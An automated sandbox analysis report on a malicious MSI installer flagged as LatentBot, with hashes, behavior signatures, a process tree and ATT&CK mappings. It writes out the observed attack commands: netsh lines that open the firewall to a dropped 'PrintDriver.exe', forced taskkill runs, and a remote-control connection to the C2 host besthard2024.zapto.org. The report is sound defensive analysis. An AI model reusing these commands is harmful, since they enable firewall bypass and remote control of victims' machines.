Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 01:04
Static task
static1
Behavioral task
behavioral1
Sample
0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi
Resource
win10v2004-20241007-en
General
-
Target
0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi
-
Size
6.7MB
-
MD5
e21b2080c98beb0f04307a5a25630e23
-
SHA1
8fc24ad51e8d61324fe8de1be667862e9238cbbb
-
SHA256
0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
-
SHA512
3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea
-
SSDEEP
196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 8 3252 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4664 netsh.exe 4984 netsh.exe -
Drops file in Windows directory 13 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9D20.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9DFB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9B85.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9BD4.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9A2D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9BE5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9C73.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD} msiexec.exe File created C:\Windows\Installer\e579990.msi msiexec.exe File opened for modification C:\Windows\Installer\e579990.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Executes dropped EXE 4 IoCs
Processes:
MSI9DFB.tmpPrintDrivers.exePrintDriver.exePrintDrivers.exepid process 220 MSI9DFB.tmp 4784 PrintDrivers.exe 4796 PrintDriver.exe 1376 PrintDrivers.exe -
Loads dropped DLL 5 IoCs
Processes:
MsiExec.exepid process 5016 MsiExec.exe 5016 MsiExec.exe 5016 MsiExec.exe 5016 MsiExec.exe 5016 MsiExec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MsiExec.exeMSI9DFB.tmpPrintDrivers.exePrintDrivers.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI9DFB.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe -
Delays execution with timeout.exe 10 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2080 timeout.exe 3232 timeout.exe 3760 timeout.exe 4344 timeout.exe 1852 timeout.exe 1104 timeout.exe 5016 timeout.exe 4056 timeout.exe 3560 timeout.exe 2820 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3204 taskkill.exe 4452 taskkill.exe 5076 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msiexec.exePrintDrivers.exepid process 3256 msiexec.exe 3256 msiexec.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe 4784 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exeWMIC.exedescription pid process Token: SeShutdownPrivilege 3252 msiexec.exe Token: SeIncreaseQuotaPrivilege 3252 msiexec.exe Token: SeSecurityPrivilege 3256 msiexec.exe Token: SeCreateTokenPrivilege 3252 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3252 msiexec.exe Token: SeLockMemoryPrivilege 3252 msiexec.exe Token: SeIncreaseQuotaPrivilege 3252 msiexec.exe Token: SeMachineAccountPrivilege 3252 msiexec.exe Token: SeTcbPrivilege 3252 msiexec.exe Token: SeSecurityPrivilege 3252 msiexec.exe Token: SeTakeOwnershipPrivilege 3252 msiexec.exe Token: SeLoadDriverPrivilege 3252 msiexec.exe Token: SeSystemProfilePrivilege 3252 msiexec.exe Token: SeSystemtimePrivilege 3252 msiexec.exe Token: SeProfSingleProcessPrivilege 3252 msiexec.exe Token: SeIncBasePriorityPrivilege 3252 msiexec.exe Token: SeCreatePagefilePrivilege 3252 msiexec.exe Token: SeCreatePermanentPrivilege 3252 msiexec.exe Token: SeBackupPrivilege 3252 msiexec.exe Token: SeRestorePrivilege 3252 msiexec.exe Token: SeShutdownPrivilege 3252 msiexec.exe Token: SeDebugPrivilege 3252 msiexec.exe Token: SeAuditPrivilege 3252 msiexec.exe Token: SeSystemEnvironmentPrivilege 3252 msiexec.exe Token: SeChangeNotifyPrivilege 3252 msiexec.exe Token: SeRemoteShutdownPrivilege 3252 msiexec.exe Token: SeUndockPrivilege 3252 msiexec.exe Token: SeSyncAgentPrivilege 3252 msiexec.exe Token: SeEnableDelegationPrivilege 3252 msiexec.exe Token: SeManageVolumePrivilege 3252 msiexec.exe Token: SeImpersonatePrivilege 3252 msiexec.exe Token: SeCreateGlobalPrivilege 3252 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeRestorePrivilege 3256 msiexec.exe Token: SeTakeOwnershipPrivilege 3256 msiexec.exe Token: SeIncreaseQuotaPrivilege 4060 WMIC.exe Token: SeSecurityPrivilege 4060 WMIC.exe Token: SeTakeOwnershipPrivilege 4060 WMIC.exe Token: SeLoadDriverPrivilege 4060 WMIC.exe Token: SeSystemProfilePrivilege 4060 WMIC.exe Token: SeSystemtimePrivilege 4060 WMIC.exe Token: SeProfSingleProcessPrivilege 4060 WMIC.exe Token: SeIncBasePriorityPrivilege 4060 WMIC.exe Token: SeCreatePagefilePrivilege 4060 WMIC.exe Token: SeBackupPrivilege 4060 WMIC.exe Token: SeRestorePrivilege 4060 WMIC.exe Token: SeShutdownPrivilege 4060 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
msiexec.exePrintDriver.exepid process 3252 msiexec.exe 3252 msiexec.exe 4796 PrintDriver.exe 4796 PrintDriver.exe 4796 PrintDriver.exe 4796 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
PrintDriver.exepid process 4796 PrintDriver.exe 4796 PrintDriver.exe 4796 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3256 wrote to memory of 5016 3256 msiexec.exe MsiExec.exe PID 3256 wrote to memory of 5016 3256 msiexec.exe MsiExec.exe PID 3256 wrote to memory of 5016 3256 msiexec.exe MsiExec.exe PID 3256 wrote to memory of 220 3256 msiexec.exe MSI9DFB.tmp PID 3256 wrote to memory of 220 3256 msiexec.exe MSI9DFB.tmp PID 3256 wrote to memory of 220 3256 msiexec.exe MSI9DFB.tmp PID 404 wrote to memory of 3048 404 cmd.exe mode.com PID 404 wrote to memory of 3048 404 cmd.exe mode.com PID 404 wrote to memory of 2488 404 cmd.exe cmd.exe PID 404 wrote to memory of 2488 404 cmd.exe cmd.exe PID 404 wrote to memory of 2796 404 cmd.exe cmd.exe PID 404 wrote to memory of 2796 404 cmd.exe cmd.exe PID 2796 wrote to memory of 5068 2796 cmd.exe reg.exe PID 2796 wrote to memory of 5068 2796 cmd.exe reg.exe PID 404 wrote to memory of 4060 404 cmd.exe WMIC.exe PID 404 wrote to memory of 4060 404 cmd.exe WMIC.exe PID 404 wrote to memory of 1976 404 cmd.exe findstr.exe PID 404 wrote to memory of 1976 404 cmd.exe findstr.exe PID 404 wrote to memory of 3320 404 cmd.exe cmd.exe PID 404 wrote to memory of 3320 404 cmd.exe cmd.exe PID 404 wrote to memory of 2512 404 cmd.exe cmd.exe PID 404 wrote to memory of 2512 404 cmd.exe cmd.exe PID 2512 wrote to memory of 3276 2512 cmd.exe mode.com PID 2512 wrote to memory of 3276 2512 cmd.exe mode.com PID 2512 wrote to memory of 4664 2512 cmd.exe netsh.exe PID 2512 wrote to memory of 4664 2512 cmd.exe netsh.exe PID 2512 wrote to memory of 4984 2512 cmd.exe netsh.exe PID 2512 wrote to memory of 4984 2512 cmd.exe netsh.exe PID 2512 wrote to memory of 2764 2512 cmd.exe WMIC.exe PID 2512 wrote to memory of 2764 2512 cmd.exe WMIC.exe PID 2512 wrote to memory of 2648 2512 cmd.exe findstr.exe PID 2512 wrote to memory of 2648 2512 cmd.exe findstr.exe PID 2512 wrote to memory of 4796 2512 cmd.exe PrintDriver.exe PID 2512 wrote to memory of 4796 2512 cmd.exe PrintDriver.exe PID 404 wrote to memory of 2080 404 cmd.exe timeout.exe PID 404 wrote to memory of 2080 404 cmd.exe timeout.exe PID 404 wrote to memory of 5076 404 cmd.exe taskkill.exe PID 404 wrote to memory of 5076 404 cmd.exe taskkill.exe PID 404 wrote to memory of 1104 404 cmd.exe timeout.exe PID 404 wrote to memory of 1104 404 cmd.exe timeout.exe PID 404 wrote to memory of 3204 404 cmd.exe taskkill.exe PID 404 wrote to memory of 3204 404 cmd.exe taskkill.exe PID 404 wrote to memory of 3232 404 cmd.exe timeout.exe PID 404 wrote to memory of 3232 404 cmd.exe timeout.exe PID 404 wrote to memory of 4452 404 cmd.exe taskkill.exe PID 404 wrote to memory of 4452 404 cmd.exe taskkill.exe PID 404 wrote to memory of 1376 404 cmd.exe PrintDrivers.exe PID 404 wrote to memory of 1376 404 cmd.exe PrintDrivers.exe PID 404 wrote to memory of 1376 404 cmd.exe PrintDrivers.exe PID 4368 wrote to memory of 4744 4368 cmd.exe mode.com PID 4368 wrote to memory of 4744 4368 cmd.exe mode.com PID 4368 wrote to memory of 4552 4368 cmd.exe cmd.exe PID 4368 wrote to memory of 4552 4368 cmd.exe cmd.exe PID 4368 wrote to memory of 4904 4368 cmd.exe cmd.exe PID 4368 wrote to memory of 4904 4368 cmd.exe cmd.exe PID 4904 wrote to memory of 1264 4904 cmd.exe reg.exe PID 4904 wrote to memory of 1264 4904 cmd.exe reg.exe PID 4368 wrote to memory of 3760 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 3760 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 4344 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 4344 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 1852 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 1852 4368 cmd.exe timeout.exe PID 4368 wrote to memory of 5016 4368 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3252
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A0046BE3624D672AFAB7454D2F0B48D82⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Windows\Installer\MSI9DFB.tmp"C:\Windows\Installer\MSI9DFB.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4784
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\mode.comMode 90,202⤵PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:2488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:5068
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:1976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:3320
-
-
C:\Windows\system32\cmd.execmd2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\mode.comMode 90,203⤵PID:3276
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4664
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4984
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:2764
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:2648
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:5115257 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4796
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2080
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:5076
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1104
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:3204
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:3232
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:4452
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\mode.comMode 90,202⤵PID:4744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:4552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:1264
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3760
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4344
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1852
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:5016
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:4056
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:3560
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2820
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD55f79a7e4a86d0bfe52c776a9643adb5b
SHA1e02c3638a1949ad7570a93acc2567bed2530c6a5
SHA256432039e3f7b5b4c0816c9621c0da2b2b4f522cd3c3810527c978ecc133e9639a
SHA512e7cb29c3f5e230bffc179ef13d130aeb010db7cbee10d8a796b0976239237234fa0bb2328cd6c0f69497bcf8bd894e78ca323dee4e21582a18cf5d246be0223c
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
SHA512a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98
-
Filesize
1KB
MD56eb13f7936a83f4c44842029914aad6e
SHA17b9b27731d4ca6f996ce68c5d68b4d653e31d915
SHA2568d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
SHA512227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e
-
Filesize
1KB
MD5eacc690f71a77685f030bef23b506b91
SHA103b911ba997d44028bf515ea44fe4813b4b4a785
SHA2560f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
SHA5129870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d
-
Filesize
403KB
MD529ed7d64ce8003c0139cccb04d9af7f0
SHA18172071a639681934d3dc77189eb88a04c8bcfac
SHA256e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
SHA5124bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415
-
Filesize
1KB
MD5cb5b8a5789c15957c039ff3ce988c1a2
SHA14de9a626f04bc7c619fdb68e5585739855ded2d1
SHA256a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4
SHA51268dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32
-
Filesize
870B
MD5fd3b5847ddb8a31413951c0aa870ab95
SHA1e3e91e3e9fa442cd1937422120de91da87973ddb
SHA256e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
SHA5125d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096
-
Filesize
997KB
MD5ec6ebf65fe4f361a73e473f46730e05c
SHA101f946dfbf773f977af5ade7c27fffc7fe311149
SHA256d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f
SHA512e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7
-
Filesize
418KB
MD5432827ec55428786a447b3d848d963b7
SHA1029901586604f3ab1b0bd18868469a96db0ef470
SHA2565a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0
SHA512efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226